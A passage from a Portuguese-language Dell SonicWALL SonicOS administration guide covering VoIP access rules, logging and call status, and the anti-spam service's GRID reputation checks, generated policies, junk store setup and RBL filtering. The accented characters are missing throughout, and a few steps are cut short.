interface disponvel.
Configurando regras de acesso de VoIP

Por padro, a inspeo de pacotes estvel no firewall permite todas as comunicaes a partir
da LAN para a Internet e bloqueia todo o trfego para a LAN a partir da Internet. possvel
definir mais regras de acesso rede para aumentar ou substituir regras de acesso padro.
Se voc estiver definindo o acesso de VoIP para que o cliente use um provedor de servios de
VoIP a partir da WAN, poder configurar regras de acesso de rede entre a interface ou zonas
de origem e de destino para permitir que clientes atrs do firewall enviem e recebam chamadas
VoIP.
Dica Embora as regras personalizadas possam ser criadas para que permitam o trfego IP de
entrada, o firewall no desabilitar a proteo contra ataques de DoS (Denial of Service),
como os ataques SYN Flood e Ping of Death.
Nota Deve-se selecionar Gerenciamento de largura de banda na pgina Rede > Interfaces para
a interface de WAN antes de poder configurar o gerenciamento de largura de banda para
as regras de acesso rede.
Para adicionar regras de acesso para o trfego de VoIP no dispositivo de segurana de rede
da Dell SonicWALL:
Etapa 1 Acesse a pgina Firewall > Regras de acesso.

Etapa 2 Para Ver estilo, clique em Todas as regras.
Etapa 3 Clique em Adicionar na parte inferior da tabela Regras de acesso. A janela Adicionar regra
exibida.
Etapa 4 Na guia Geral, selecione Permitir na lista Ao para permitir o trfego.
Etapa 5 Selecione de/para zonas nos menus De zona e Para Zona.
Etapa 6 Selecione o servio ou o grupo de servios afetados pela regra de acesso na lista Servio.
Para H.323, selecione um dos seguintes ou selecione Criar Novo grupo e adicione os
seguintes servios no grupo:
Sinalizao de chamada H.323
Descoberta de Gatekeeper H.323
RAS de Gatekeeper H.323

Para SIP, selecione SIP
Etapa 7 Selecione a origem do trfego afetado pela regra de acesso na lista Origem. Selecionar Criar
Etapa 8 Se voc desejar definir os endereos IP de origem afetados pela regra de acesso, como
restringindo que determinados usurios acessem a Internet, selecione Intervalo no Tipo:
menu suspenso. Insira o endereo IP mais baixo e mais alto no intervalo nos campos
Iniciando endereo IP: e Encerrando endereo IP.
Etapa 9 Selecione o destino do trfego afetado pela regra de acesso na lista Destino. Selecionar Criar
Etapa 10 No menu Usurios permitidos, adicione o usurio ou o grupo de usurios afetados pela regra
de acesso.
Etapa 11 Selecione uma programao no menu Programao, se desejar permitir o acesso de VoIP
apenas durante horrios especificados. O cronograma padro est Sempre ativo. possvel
especificar objetos de programao na pgina Sistema > Programaes.
Etapa 12 Insira os comentrios para ajudar a identificar a regra de acesso no campo Comentrios.
Etapa 13 Clique na guia Largura de banda.
Etapa 14 Selecione Gerenciamento de largura de banda, e insira a Largura de banda garantida em
Kbps.
Etapa 15 Insira a quantidade mxima de largura de banda disponvel para a Regra a qualquer momento
no campo Mximo de largura de banda.
Etapa 16 Atribua uma prioridade de 0 (mais alto) a 7 (mais baixo) na lista Prioridade de largura de
banda. Para obter a qualidade de chamada VoIP mais alta, assegure-se de que o trfego de
VoIP receba prioridade ALTA.
Dica As regras que usam o Gerenciamento de largura de banda tm prioridade sobre regras sem
gerenciamento de largura de banda.
Configurando a criao de log do VoIP

possvel habilitar a criao de logs de eventos de VoIP na pgina Log > Categorias. As
entradas de log so exibidas na pgina Log > Ver.
Para habilitar a criao de logs:
Etapa 1 Acesse Log > Categorias.

Etapa 2 Selecione Categorias expandidas no menu Ver estilo na seo Categorias de log.
Etapa 3 Localize a entrada VoIP (atividade VOIP H.323/RAS, H.323/H.225, H.323/H.245) na tabela.
Etapa 4 Selecione Log para habilitar a exibio de eventos de log de VoIP na pgina Log > Ver.
Etapa 5 Selecione Alertas para permitir o envio de alertas para a categoria.
Etapa 6 Selecione Syslog para habilitar a captura de eventos de log no log do sistema do firewall.

Status de chamada VoIP
A pgina VoIP > Status de chamada fornece uma lista de chamadas VoIP atualmente ativas.
A tabela de status de chamada VoIP exibe as seguintes informaes sobre a conexo VoIP
ativa:
IP do chamador
ID do chamador
IP do chamado
ID do chamado
Protocolo
Largura de banda
Hora de incio
Os administradores podem ver as informaes da pessoa que chamada e da pessoa chamada,
bem como a durao da chamada e a largura de banda usada. As chamadas ativas H.323 e
SIP so exibidas na pgina VoIP > Status de chamada.
As transformaes de H.323 e de SIP devem ser habilitadas na pgina VoIP > Configuraes
para que as chamadas correspondentes sejam exibidas. Somente quando essas opes esto
habilitadas o SonicOS inspeciona a carga de VoIP para rastrear o andamento da chamada.
Para redefinir as conexes para todas as chamadas ativas em andamento:
Clique em Liberar tudo para remover todas as entradas de chamadas VoIP.

Parte 12
Anti-spam
| 793
Captulo 52
Configurar o anti-spam
Anti-spam
Esta seo descreve como ativar, configurar e gerenciar o Comprehensive Anti-Spam Service
em um dispositivo de segurana de rede Dell SonicWALL.
Viso geral do anti-spam na pgina 795
Adquirir uma licena de anti-spam na pgina 801
Anti-spam > Status na pgina 802
Anti-spam > Configuraes na pgina 803
Anti-spam > Estatsticas na pgina 807
Anti-spam > Filtro de lista negra em tempo real na pgina 807
Anti-spam > Viso da caixa de lixo eletrnico na pgina 811
Anti-Spam > Configuraes da caixa de lixo eletrnico na pgina 813
Anti-spam > Resumo de lixo eletrnico na pgina 814
Anti-spam > Configurao de exibio do usurio na pgina 816
Anti-Spam > Catlogos de endereos na pgina 817
Anti-spam > Gerenciar usurios na pgina 819
Anti-Spam > Configurao LDAP na pgina 820
Anti-spam > Avanado na pgina 824
Anti-spam > Downloads na pgina 825
Viso geral do anti-spam

Esta seo fornece uma apresentao do Comprehensive Anti-Spam Service. Esta seo
O que anti-spam? na pgina 796
Como funciona o servio anti-spam? na pgina 797
Configurar o anti-spam | 795

O que anti-spam?
O recurso anti-spam fornece um mtodo rpido, eficiente e eficaz de adicionar recursos anti-
-spam, anti-phishing e antivrus ao seu firewall existente.
Em uma configurao tpica de anti-spam, o administrador escolhe adicionar recursos anti-
-spam selecionando-os na interface do SonicOS e licenciando-os. O firewall utiliza ento a
mesma tecnologia avanada de filtragem de spam que os produtos de Email Security da Dell
SonicWALL para reduzir o volume de lixo eletrnico que uma empresa fornece aos usurios.
Existem duas formas principais de anlise de mensagens de entrada pelo recurso anti-spam:
gerenciamento avanado de reputao de IP e gerenciamento avanado de contedos com
base na nuvem. A reputao do endereo IP usa a rede GRID para identificar os endereos IP
de remetentes de spam conhecidos e rejeitar todas as mensagens desses remetentes sem
mesmo permitir uma conexo. O gerenciamento da reputao do IP do remetente da rede
GRID verifica o endereo IP de solicitaes de conexo de entrada em relao a uma srie de
listas e estatsticas para garantir que a conexo tem a probabilidade de fornecer um e-mail
importante. As listas so compiladas com a inteligncia colaborativa da rede GRID Dell
SonicWALL. Remetentes de spam conhecidos so impedidos de se conectar ao firewall e os
contedos do lixo eletrnico nunca consomem recursos nos sistemas de destino.
Os e-mails que no so provenientes de remetentes de spam conhecidos so analisados com
base em "GRIDprints" geradas pelos laboratrios de pesquisa da SonicWALL e baseiam-se em
dados de milhes de pontos terminais empresariais, centenas de milhes de mensagens e
bilhes de votos de reputao dos usurios da rede GRID. A nossa rede GRID usa dados de
vrias solues da SonicWALL para a criao de uma rede de inteligncia colaborativa que
atua contra as ameaas a nvel mundial. As GRIDprints identificam exclusivamente
mensagens sem expor dados includos na mensagem de e-mail.
O servio anti-spam determina se um e-mail se enquadra apenas em uma das seguintes
ameaas: Spam, provvel spam, phishing, provvel phishing, vrus ou provvel vrus. Ele usa
a seguinte ordem de prioridade ao avaliar ameaas em mensagens de e-mail:
Phishing
Provvel phishing
Vrus
Spam
Provvel spam
Provvel vrus
Por exemplo, se uma mensagem for um vrus e spam, ela ser classificada como um vrus,
pois o vrus tem prioridade em relao ao spam.
Se o servio anti-spam determinar que a mensagem no se enquadra em nenhuma das
ameaas acima, ela considerada confivel e enviada para o servidor de destino.
Benefcios
Adicionar proteo anti-spam ao seu firewall aumenta a eficcia do seu sistema como um todo,
filtrando e rejeitando mensagens de lixo eletrnico antes de elas serem visualizadas pelos
usurios em suas caixas de entrada.
Quantidade reduzida de largura de banda e de recursos consumidos por lixo eletrnico na sua rede
Nmero reduzido de mensagens recebidas enviadas para o servidor de e-mail
Ameaa reduzida para a empresa, porque os usurios no conseguem infectar
acidentalmente os seus computadores clicando em spam e vrus
Melhor proteo para os usurios contra ataques de phishing

Como funciona o servio anti-spam?
Esta seo descreve o recurso anti-spam, incluindo a rede GRID Dell SonicWALL, e como ele
interage com o SonicOS como um todo. Os dois pontos de conexo significativa com o
SonicOS so os objetos de servio e endereo. Voc pode usar os objetos de servio e
endereo para configurar o recurso anti-spam para funcionar corretamente com o SonicOS.
Por exemplo, usar o objeto do servio anti-spam para configurar polticas de NAT para arquivar
e-mails de entrada, bem como envi-los atravs de um filtro.
O Comprehensive Anti-Spam Service analisa os cabealhos e contedos de mensagens e usa
impresso GRID colaborativa para bloquear e-mail de spam.
Rede GRID
Esta seo descreve o gerenciamento da conexo GRID com o recurso de reputao do IP do
remetente que usado pelo SonicWALL Email Security e pelo servio anti-spam no SonicOS.
A reputao do IP do remetente da rede GRID a reputao que um determinado endereo
IP tem com membros da rede GRID Dell SonicWALL. Quando este recurso est habilitado, no
so aceitos e-mails de endereos IP com reputao duvidosa. Quando o SonicOS no aceita
uma conexo de um endereo IP invlido conhecido, as mensagens desse endereo IP nunca
chegam ao servidor de e-mail.
O sistema de reputao do IP do remetente da rede GRID verifica o endereo IP de
solicitaes de conexo de entrada em relao a uma srie de listas e estatsticas para garantir
que a conexo tem a probabilidade de fornecer um e-mail importante. As listas so compiladas
com a inteligncia colaborativa da rede GRID Dell SonicWALL. Remetentes de spam
conhecidos so impedidos de se conectar ao firewall e os contedos do lixo eletrnico nunca
consomem recursos nos sistemas de destino.
Benefcios:
80% do lixo eletrnico bloqueado no nvel da conexo, antes mesmo de o e-mail ser
aceito na sua rede. So necessrios menos recursos para manter o nvel de proteo
contra spam.
A largura de banda no desperdiada na recepo de lixo eletrnico em seus servidores,
somente para analisar e exclu-lo.
Uma rede global vigia os remetentes de spam e ajuda usurios legtimos a restaurar a sua
reputao de IP, se necessrio.
Gerenciamento de conexes GRID com ordem de prioridade do gerenciamento de conexes

e reputao do IP do remetente
Quando uma solicitao enviada para seu primeiro firewall, o servio anti-spam avalia a
"reputao" do solicitante. A reputao compilada a partir de listas brancas de remetentes
confiveis, listas de bloqueios de remetentes de spam conhecidos e limites de negao de
servio.
Se a reputao de IP estiver habilitada, o endereo IP de origem verificado nesta ordem:
Avaliao Descrio
Lista de permisses Se um endereo IP se encontrar nessa lista, ele tem permisso para
enviar mensagens atravs do
gerenciamento de conexes. As mensagens sero analisadas pelo
firewall, como habitual.
Lista de contatos Este endereo IP impedido de se conectar ao firewall.
bloqueados

Avaliao Descrio
Lista de reputao Se o endereo IP no se encontrar nas listas anteriores, o firewall
verifica a rede GRID para ver se esse endereo IP tem uma reputao
duvidosa.
Lista de adiamentos As conexes desse endereo IP so adiadas. Deve ser aprovado um
intervalo definido antes de a conexo ser permitida.
DoS Se o endereo IP no se encontrar nas listas anteriores, o firewall
verifica se o endereo IP passou o limite de negao de servio. Se tiver
passado, o dispositivo utiliza as configuraes de DoS existentes para
executar uma ao.
O firewall permite que o servidor realize uma conexo e transmita e-mails somente se o
endereo IP passar todos os testes. Se o endereo IP no passar nos testes, enviada uma
mensagem do SonicOS para o servidor que efetua a solicitao a indicar que no existe
nenhum servidor SMTP. A solicitao de conexo no aceita.
Objetos de servio e endereo

O recurso anti-spam do SonicOS suporta objetos de servio e endereo para gerenciar
servidor(es) de e-mails de um cliente. Esses objetos so usados pelo servio anti-spam para
as polticas de NAT e regras de acesso. As regras criadas automaticamente no so editveis
e sero excludas se o servio anti-spam for desabilitado.
Quando for habilitado, o servio anti-spam criar as polticas de NAT e regras de acesso para
controlar e redirecionar trfego de e-mail. As polticas e regras podem ser visualizadas nas
pginas Rede > Polticas de NAT e Regras de firewall, mas no so editveis. Essas polticas
criadas automaticamente esto somente disponveis quando o servio anti-spam est
habilitado.
Quando o servio anti-spam est licenciado e ativado, a pgina Anti-spam > Configuraes
mostra uma nica caixa de seleo para habilitar o anti-spam. Ao marcar a caixa de seleo,
o assistente de poltica de servidor de e-mail de destino ativado se no existir nenhuma regra
de acesso personalizada e poltica de NAT para um cenrio j implantado. Quando voc
configura polticas geradas, o servio anti-spam precisa saber para onde os e-mails so
roteados atrs do firewall. Especificamente, ele precisa do endereo IP do servidor de e-mail
de destino e da respectiva atribuio de zona. O assistente de poltica de servidor de e-mail
de destino iniciado se no for possvel encontrar esses dados.
Voc precisar das informaes a seguir para o assistente:
Endereo IP pblico do servidor de e-mail de destino o endereo IP ao qual os MTAs
externos se conectaro atravs de SMTP.
Endereo IP privado do servidor de e-mail de destino o endereo IP interno do
servidor Exchange ou SMTP (atrs do firewall).
Atribuio de zonas a zona qual o servidor Exchange est atribudo.
Porta de e-mail de entrada o nmero da porta do servio TCP para a qual os e-mails
sero enviados, tambm conhecida como a porta SMTP de entrada.
As polticas e os objetos de endereos criados pelo assistente so editveis e persistem
mesmo se o servio anti-spam estiver desabilitado.
Objetos criados quando o servio anti-spam est habilitado

Esta seo fornece um exemplo do tipo de regras e objetos gerados automaticamente, como
regras de acesso do firewall, polticas de NAT e objetos de servio. Esses objetos no so
editveis e sero removidos se o servio anti-spam estiver desabilitado.

A pgina Firewall > Regras de acesso mostra as regras geradas utilizadas para anti-spam.
Figura 18 Regras de acesso geradas
As linhas contornadas em vermelho so as regras de acesso geradas quando o anti-spam est

ativado. A linha contornada em verde a regra padro que o anti-spam cria se no existirem
polticas de servidor de mensagens.
Voc tambm pode criar as seguintes regras de acesso:
Regra WAN para WAN para e-mails recebidos (SMTP) de qualquer origem para todos os
endereos IP da WAN
Regra WAN para LAN e-mails processados do Email Security Service para todos os
endereos IP da WAN que usam a porta do servio anti-spam (padro: 10025)
O objeto do servio anti-spam criado na pgina Rede > Servios.
Figura 19 Objeto gerado de servio anti-spam
Este objeto de servio referenciado pelas polticas de NAT geradas.

Figura 20 Polticas de NAT geradas
As linhas contornadas em vermelho so as polticas geradas quando o anti-spam est ativado.

A linha contornada em verde a poltica padro que o anti-spam cria se no existirem polticas
de servidor de mensagens.
Objetos criados pelo assistente

Os objetos criados a partir da interao de um administrador com o assistente podem ser
editados e permanecer no sistema, mesmo se o servio anti-spam estiver desabilitado.
As consideraes a seguir aplicam-se gerao automtica de polticas:
Um objeto de grupo de endereos do sistema denominado Grupo de endereos de
servidor de e-mail pblico criado como um padro para o destino original de polticas
geradas. Este grupo contm o objeto de endereo, IP pblico do servidor de mensagens
de destino, o qual utiliza o valor do endereo IP fornecido durante o assistente.
No caso de um dispositivo UTM SonicWALL que j possui regras para SMTP, ocorrem os
procedimentos a seguir:
Se o destino original da poltica existente for um objeto de endereo do tipo host, ento
as polticas geradas utilizam o objeto Grupo de endereos de servidor de e-mail
pblico como o destino original.
Se o destino original da poltica de existente for um objeto de endereo do tipo no
host, as polticas geradas usam esse objeto de endereo do tipo no host como o
destino original.
Se houver mais de um endereo IP pblico para SMTP, o administrador pode
manualmente adicionar objetos de endereo ao Grupo de endereos de servidor de
e-mail pblico.
Alteraes na poltica no objeto

Na pgina diag.html, o boto Redefinir cache de nome GRID pode ser usado para limpar
todas as entradas no cache de nome GRID.
O boto Excluir polticas e objetos pode ser usado para remover polticas e objetos de
servio e endereo anti-spam que no so excludos quando o servio est desativado. Ao
clicar em este boto, o SonicOS tenta remover todas as polticas e todos os objetos gerados
automaticamente. Esta operao s permitida quando o servio anti-spam est desativado.

Figura 21 Opes de diagnstico
As outras opes da pgina diag.html relacionadas ao anti-spam so:

Desabilitar proteo contra inundao SYN para conexes relacionadas ao anti-
spam a proteo contra inundao SYN por padro est ativada para portas SMTP (25)
e de servio anti-spam (10025). Isto desabilita a proteo.
Usar somente verificao da reputao de IP GRID quando selecionada, a opo
substitui o resultado da investigao e simula o servio anti-spam como estando no
disponvel (admin inativo). Quando um e-mail enviado, ele ainda passa pela verificao
de INUNDAO SYN e IP GRID, mas no realizada outra verificao de e-mail.
Adquirir uma licena de anti-spam

Os seguintes pr-requisitos de implantao so necessrios para usar o anti-spam do recurso
UTM:
Um dispositivo de segurana de rede Dell SonicWALL licenciado
Licena de anti-spam para o UTM
Um dos seguintes servidores Microsoft Windows:
Windows Server 2003 (32 bits)
Windows SBS Server 2003 (32 bits)
Windows Server 2008 (32 bits, 64 bits)
Windows SBS Server 2008 (64 bits)
A aquisio de uma licena de anti-spam para o firewall pode ser executada diretamente
atravs de mySonicWALL.com ou do seu revendedor.
Nota Seu dispositivo de segurana de rede Dell SonicWALL deve ser registrado no
mySonicWALL.com antes de usar.

Etapa 1 Abra um navegador da Web no computador que voc estiver usando para gerenciar o
SonicWALL Product_Name Variable e digite http://www.mySonicWALL.com no campo local
ou endereo.
Etapa 2 Insira seu nome do usurio e sua senha da conta mySonicWALL.com nos campos
apropriados. Clique no boto Enviar.
Etapa 3 Navegue at Meus produtos na barra de navegao esquerda.
Etapa 4 Selecione o dispositivo UTM ao qual voc deseja adicionar o recurso anti-spam.
Etapa 5 Registre-se para obter uma licena de anti-spam do UTM.
Etapa 6 Efetue login na interface de gerenciamento da Web do dispositivo
SonicWALL Product Name (Short) Variable.
Etapa 7 Navegue at a pgina Sistema > Licenas na barra de navegao mySonicWALL.com.
Etapa 8 Na seo Gerenciar servios de segurana online, clique no link para ativar ou renovar sua
licena. Como alternativa, insira a sua chave ou o conjunto de chaves.
Etapa 9 Insira suas informaes de login mySonicWALL.com.
Anti-spam > Status

Use a pgina Status para visualizar o estado da sua licena e do monitoramento.

A pgina de status tambm inclui a seo Captura de diagnstico de fluxo de e-mail. Inicie
a captura para criar um relatrio formatado pelo aplicativo no trfego relacionado a SMTP
passando pelo seu firewall. Interrompa a captura a qualquer momento. Faa o download dos
dados para visualizar as informaes em outro aplicativo. Este relatrio contm somente
trfego de entrada.
Para pesquisar o registro MX de um remetente de e-mail, digite-o no campo Pesquisar nome
ou IP na seo Pesquisa de registro MX e verificao de banner e, em seguida, clique em
Ir. O Comprehensive Anti-Spam Service ir tentar se conectar ao servidor e recuperar o banner
SMTP. Esse recurso permite que voc verifique se um remetente de e-mail no est
falsificando um endereo para parecer mais legtimo.
Para executar uma verificao de reputao de IP GRID, insira um Endereo IP do host e,
em seguida, clique em Ir. Para obter mais informaes sobre redes GRID, consulte Rede GRID
na pgina 797.
Anti-spam > Configuraes

Quando voc tiver registrado o anti-spam do UTM, ative-o para iniciar a proteo contra
mensagens de spam, phishing e vrus ao nvel do dispositivo UTM.

Etapa 1 Navegue at a pgina Anti-spam > Configuraes.
Etapa 2 Clique em Habilitar servio anti-spam para ativar o anti-spam do recurso UTM.
Etapa 3 Em seguida, clique no cone do instalador do repositrio de lixo eletrnico para instalar o
repositrio de lixo eletrnico em seu servidor do Windows.
Nota A SonicWALL recomenda a instalao do repositrio de lixo eletrnico no seu servidor para
utilizar plenamente as mais recentes funcionalidades disponveis com o CASS 2.0.
Configurar o anti-spam do UTM

Quando o anti-spam do UTM estiver ativado, defina as suas preferncias. Depois dessas
configuraes, seu e-mail ser filtrado e classificado de acordo com a sua configurao.
A seo Configuraes de categorias de ameaa de e-mail permite ao administrador definir
configuraes padro para mensagens de usurios. Escolha as configuraes padro de
mensagens que contm spam, phishing e vrus.
Use as opes da lista suspensa para escolher como tratar mensagens em cada categoria de
ameaas. As opes so as seguintes:
Resposta Efeito
Filtragem desativada O anti-spam do UTM no ir verificar e filtrar qualquer e-mail para
esta categoria de ameaas, de forma que todas as mensagens de e-
mail sejam enviadas para os destinatrios.
Marcar com O e-mail marcado com um termo na linha de assunto, por exemplo,
[LIXO ELETRNICO] ou [Possvel lixo eletrnico?]. A seleo dessa
opo permite que o usurio controle o e-mail e envie as mensagens
para a pasta de lixo eletrnico se forem consideradas indesejadas.
Armazenar na caixa de lixo A mensagem de e-mail armazenada na Caixa de Lixo Eletrnico.
eletrnico Ela pode ser liberada por usurios e administradores com as
(configurao padro) permisses apropriadas. Esta opo a configurao recomendada.
Excluir permanentemente A mensagem de e-mail excluda permanentemente.
CUIDADO: Se voc selecionar esta opo, sua organizao corre o
risco de perder e-mails importantes.

Se voc estiver usando mais de um domnio, escolha a opo Mltiplos domnios e entre em
contato com a SonicWALL ou com o seu revendedor SonicWALL para obter mais informaes.
As listas de acesso definidas pelo usurio indicam que clientes tm permisso para se
conectar ao entregar e-mail. Voc tambm pode definir os clientes que sero automaticamente
rejeitados.
As opes avanadas permitem configurar o seguinte:
Configurao Descrio
Permitir a entrega de correio no Se o servio anti-spam no estiver habilitado ou no estiver
processado quando o servio anti- disponvel por algum motivo, voc poder optar por permitir que todos
spam abrangente no est os e-mails no processados sejam enviados. As mensagens de spam
disponvel sero enviadas para os usurios, bem como e-mails legtimos.
Marcar e entregar ou excluir e-mails Se o repositrio de lixo eletrnico no pode aceitar as mensagens de
quando o repositrio de lixo spam, voc pode optar para exclu-las ou envi-las com linhas de
eletrnico SonicWALL no est assunto de advertncia, como "[Phishing] Renove sua conta".
indisponvel
Intervalo de investigao Defina o nmero de minutos entre as mensagens para o servio de
monitoramento.
Limite de contagem de bem- Defina o nmero de xitos necessrios para relatar um xito ao
sucedidos servio de monitoramento.
Limite de contagem de falhas Defina o nmero de falhas necessrias para denunciar uma falha ao
servio de monitoramento.
Endereo IP pblico do servidor O endereo IP do servidor que est disponvel para conexes
externas.
Endereo IP privado do servidor O endereo IP do servidor para trfego interno.
Porta de e-mail de entrada A porta que o UTM abriu para receber e-mails de origem externa.
Usar endereo privado do servidor Se o repositrio de lixo eletrnico se encontrar no servidor de e-mail
de correio de destino como de destino, selecione a caixa de seleo. Caso contrrio, insira o
endereo do repositrio de lixo endereo IP do repositrio de lixo eletrnico de onde o servidor se
eletrnico encontra localizado.
Habilitar deteco de subsistema Detecte outros sistemas em execuo no seu fluxo de e-mails.
Instalar o repositrio de lixo eletrnico

O anti-spam do UTM pode criar um repositrio de lixo eletrnico no seu servidor Microsoft
Exchange. O repositrio de lixo eletrnico coloca mensagens em quarentena para anlise pelo
usurio final e fornece estatsticas. Efetue logon no seu sistema Exchange e, em seguida, abra
um navegador e faa logon na interface de gerenciamento e instale o repositrio de lixo
eletrnico.

Observe que a Dell SonicWALL suporta servidores SMTP no Exchange, como o Sendmail e
o Lotus Domino, no sendo necessrio instalar o repositrio de lixo eletrnico em um desses
servidores. Semelhante ao produto Email Security da Dell SonicWALL, o recurso CASS 2.0
permite que voc instale o repositrio de lixo eletrnico em um servidor autnomo.
Se voc estiver utilizando um servidor Exchange:
Etapa 1 Efetue logon no seu sistema Exchange e, nesse sistema, abra um navegador da Web e faa
logon na interface.
Etapa 2 Na pgina Anti-spam > Configuraes, clique no cone do instalador do repositrio de lixo
eletrnico para instalar o repositrio de lixo eletrnico no seu Windows Server.
Etapa 3 O navegador pode avis-lo de que o site da Web est tentando carregar o complemento Email
Security da Dell SonicWALL. Clique na barra de informaes e selecione Instalar controle
ActiveX no menu pop-up.
Etapa 4 Na tela de aviso de segurana, clique em Instalar para instalar o controle ActiveX.
Etapa 5 Na pgina Anti-spam > Configuraes, clique novamente no cone Instalador do
repositrio de lixo eletrnico. Uma barra de progresso exibida na pgina.
Etapa 6 O instalador inicia quando o download terminado. Observe que a migrao de dados no
repositrio de lixo eletrnico poder demorar a concluir.

Etapa 7 Navegue para a pgina Anti-spam > Status e verifique se o repositrio de lixo eletrnico da
Dell SonicWALL est Operacional. Demora normalmente cerca de 15 minutos para que o
repositrio de lixo eletrnico fique operacional.
Anti-spam > Estatsticas

Use esta pgina para visualizar as estatsticas sobre o nmero de mensagens que esto sendo
bloqueadas pelo seu recurso anti-spam do UTM. O tipo de mensagem bloqueada e o nmero
so apresentados.
Anti-spam > Filtro de lista negra em tempo real

A pgina Anti-spam > Filtro RBL permite apenas uma configurao de filtragem de lista negra
em tempo real se o servio anti-spam no estiver habilitado.

Nota A tela de configurao do filtro RBL estava anteriormente localizada em Servios de
segurana no painel de navegao esquerdo. Agora pode encontr-la no grupo do menu
Anti-spam. O servio anti-spam um superconjunto avanado da filtragem RBL do SonicOS
padro. Portanto, quando o anti-spam ativado, a filtragem RBL automaticamente
desabilitada. Se o anti-spam no estiver habilitado, voc pode definir as configuraes na
pgina Filtro RBL.
A lista negra em tempo real (RBL) SMTP um mecanismo para publicar os endereos IP de
remetentes de spam SMTP. Existem vrias organizaes que compilam estas informaes
gratuitamente: http://www.spamhaus.org e com fins lucrativos: http://www.mail-abuse.com.
Pode ser encontrada uma lista bem atualizada de servios RBL e a respectiva eficcia em:
http://www.sdsc.edu/~jeff/spam/cbc.html
Nota RBL SMTP uma tcnica de filtragem de spam agressiva que pode ser propensa a falsos
positivos, porque se baseia em listas compiladas de atividades de spam relatadas. A
implementao do SonicOS de filtragem RBL SMTP fornece vrios mecanismos de ajuste
para ajudar a garantir a preciso da filtragem.
Os provedores de listas de RBL publicam as suas listas usando o DNS. Os endereos IP

bloqueados so exibidos no banco de dados do domnio DNS do provedor de listas usando
notao IP invertida do servidor SMTP em questo como um prefixo do nome de domnio. Um
cdigo de resposta de 127.0.0.2 para 127.0.0.9 indica algum tipo de inconvenincia:
Por exemplo, se um servidor SMTP com o endereo IP 1.2.3.4 for bloqueado pelo provedor de
lista RBL sbl-xbl.spamhaus.org, uma consulta DNS para 4.3.2.1.sbl-xbl.spamhaus.org
originar uma resposta 127.0.0.4, indicando que o servidor uma origem de spam conhecida
e que a conexo ser descartada.
Nota A maioria do spam dos dias de hoje conhecido por ser enviado de mquinas roubadas ou
zumbis que executam uma implementao fina de servidor SMTP. Ao contrrio de
servidores SMTP legtimos, esses computadores zumbis raramente tentam repetir
tentativas de entrega falhadas. Quando uma tentativa de entrega bloqueada pelo filtro
RBL, no sero realizadas mais tentativas de entrega para esse mesmo spam.

Quando a opo Habilitar bloqueio de lista negra em tempo real est habilitada na pgina
Anti-spam > Filtro RBL, as conexes de entrada de hosts na WAN ou as conexes de sada
para hosts na WAN so verificadas em relao a cada servio RBL habilitado com uma
solicitao de DNS a servidores DNS configurados em Servidores DNS RBL.
O menu Servidores DNS RBL permite que voc especifique os servidores DNS. Voc pode
escolher Herdar configuraes da zona de WAN ou Especificar servidores DNS
manualmente. Se voc selecionar Especificar servidores DNS manualmente, digite os
endereos do servidor DNS nos campos Servidor DNS.
As respostas do DNS so coletadas e armazenadas em cache. Se qualquer uma das consultas
resultar em uma resposta de lista negra, o servidor ser filtrado. As respostas so
armazenadas em cache usando valores TTL e as respostas no bloqueadas recebem um TTL
de cache de 2 horas. Se o cache for preenchido, as entradas de cache sero descartadas da
forma FIFO (first-in-first-out [primeiro a entrar, primeiro a sair]).
A verificao de endereo IP usa o cache para determinar se uma conexo deve ser
descartada. Inicialmente, os endereos IP no se encontram em cache e deve ser realizada
uma solicitao de DNS. Nesse caso, o endereo IP considerado inofensivo at prova em
contrrio e a verificao resulta na permisso da conexo. realizada uma solicitao de DNS
e os resultados so armazenados em cache em uma tarefa separada. Quando pacotes
subsequentes deste endereo IP esto marcados, se o endereo IP estiver bloqueado, a
conexo ser descartada.

Adicionar servios RBL
Voc pode adicionar mais servios RBL na seo Servios de lista negra em tempo real.
Para adicionar um servio RBL, clique no boto Adicionar. Na janela Adicionar domnio
RBL, voc especifica o domnio RBL a ser consultado, ativa-o para uso e especifica os
respectivos cdigos de resposta esperados. A maioria dos servios RBL lista as respostas
fornecidas no respectivo site da Web, embora a seleo de Bloquear todas as respostas seja
geralmente aceitvel.

As estatsticas so mantidas para cada servio RBL na tabela Servio RBL e podem ser
visualizadas passando o mouse sobre o cone (estatsticas) direita na entrada do servio.
Listas de servidor SMTP definidas pelo usurio

A seo Listas de servidor SMTP definidas pelo usurio permite que os objetos de
endereos sejam usados para construir uma lista branca (permisso explcita) ou lista negra
(negao explcita) de servidores SMTP. As entradas nesta lista ignoraro o procedimento de
consulta RBL. Por exemplo, para garantir que voc sempre recebe conexes SMTP de um
servidor SMTP de um site parceiro, crie um objeto de endereo para o servidor usando o boto
Adicionar, clique no cone de edio na coluna Configurar da linha Lista branca de usurios
RBL e adicione o Objeto de endereo. A tabela ser atualizada e esse servidor sempre ter
permisso para trocas SMTP.
A pgina Sistema > Diagnstico tambm oferece um recurso de Pesquisa de lista negra em
tempo real que permite que endereos IP SMTP (ou servios RBL ou servidores DNS) sejam
especificamente testados.
Para obter uma lista de origens de spam conhecidas para uso em teste, consulte:
http://www.spamhaus.org/sbl/latest.lasso
Anti-spam > Viso da caixa de lixo eletrnico

Na pgina Anti-spam > Viso da caixa de lixo eletrnico, voc pode visualizar, pesquisar e
gerenciar todas as mensagens de e-mail que se encontram atualmente no repositrio de lixo
eletrnico no servidor Exchange ou SMTP. Este recurso est disponvel somente se o
repositrio de lixo eletrnico estiver instalado.

Pesquisar no repositrio de lixo eletrnico
Pesquise no repositrio de lixo eletrnico uma cadeia de texto em qualquer um dos seguintes
campos de e-mail:
Para
Assunto
De
Data
Ou selecione uma ou mais categorias de ameaa de e-mail para pesquisa.
Para pesquisar no repositrio de lixo eletrnico, execute as seguintes etapas:
Etapa 1 Na guia Entrada da pgina Anti-spam > Viso da caixa de lixo eletrnico, digite o texto a
pesquisar na caixa de texto Pesquisar.
Etapa 2 Selecione o campo de e-mail no qual deseja pesquisar na lista suspensa entrada.
Etapa 3 Marque uma ou mais caixas de seleo de categorias de ameaa de e-mail a pesquisar. As
categorias que no estejam marcadas no sero pesquisadas.
Somente as mensagens que pertencem a uma das categorias de ameaa de e-mail definidas
em Armazenar na caixa de lixo eletrnico na pgina Anti-spam > Configuraes so
includas no repositrio de lixo eletrnico. No entanto, todas as categorias esto listadas nesta
pgina quer as mensagens desse tipo estejam ou no armazenadas no repositrio de lixo
eletrnico.
Clique no boto Ir para realizar uma pesquisa.
Os resultados so exibidos na seo inferior da pgina.
Gerenciar o repositrio de lixo eletrnico na exibio da caixa de lixo eletrnico

